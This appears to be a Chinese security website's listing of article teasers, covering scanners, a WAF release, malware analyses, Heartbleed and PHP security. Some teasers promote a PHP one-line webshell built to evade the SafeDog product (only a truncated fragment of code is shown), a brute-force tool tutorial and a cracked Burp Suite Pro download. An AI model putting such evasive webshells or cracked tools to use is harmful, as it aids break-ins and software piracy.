概述 Golismero是一款开源的Web扫描器,它不但自带不少的安全测试工具,而且还可导入分析市面流行的扫描工具的结果,比如Openvas,Wfuzz, SQLMap, DNS recon等,并自动...
神兵利刃
神兵利刃
神兵利刃
开源Web应用防火墙(WAF)- ModSecurity v2.7发布
ModSecurity是知名的开源web应用防火墙,它可以作为你的服务器基础安全设施,是广大站长的福音。目前支持Apache,IIS7和Nginx。 新版改进 1.不需要对现有网络进行调整,只需要分分...
神兵利刃
burpsuite_pro_v1.5.20破解版下载
破解 by LarryLau Burp Suite是一个Web应用程序集成渗透测试平台,它包含了一系列burp工具,这些工具之间有大量接口可以互相通信。平台中所有工具共享同一robust框架,以便统一...
FreeBSD 9.3正式发布
FreeBSD是一款免费的Unix操作系统,是由经过BSD、386BSD和4.4BSD发展而来的类Unix的一个重要分支。FreeBSD 9.3今天正式发布,这是稳定的9.x分支的第四个版本,在Fre...
移动安全
Android木马分析简介
本文介绍基于Android的手机恶意软件,是一个基础性的介绍,给新入门的人提供一个分析和工具指引。要分析的木马是一个2013年的syssecApp.apk,这个木马的分析能对Android...
硬件安全
Havex:以工控设备为狩猎目标的恶意软件
在过去一年,我们对Havex恶意程序家族及其背后的组织保持了高度的关注。Havex被认为以不同工业领域为目标进行攻击的恶意软件,并且在最初的报告中,该恶意软件对能源行业尤为感兴趣。Havex的主要构成...
如何阻止下一次心脏出血漏洞
原文:How to Prevent the next Heartbleed.docx 翻译:赵阳 一、引言 基于OpenSSL的心脏出血漏洞被认为是CVE-2014-0160的严重问题,OpenSSL...
浅谈php安全
这段时间一直在写一个整站,前几天才基本完成了,所以抽个时间写了一篇对于php安全的总结。技术含量不高,过不了也没关系,希望能一些准备写网站的朋友一点引导。 在放假之初,我抽时间看了《...
PHP的一个免杀一句话,突破安全狗
<?php error_reporting(0); set_time_limit(0); function decrypt($ciphertext_hex,$key){ $key=md...
Python爆破工具编写
爆破工具千千万,各种各样。但是基本上工具都是对应特定的情况,所以有的时候需要根据不同的情况编写一些爆破工具。我这里用一个简单的实例来讲解下爆破工具的编写原理,就是从我们收集的字典中依次提取数据,然后提...
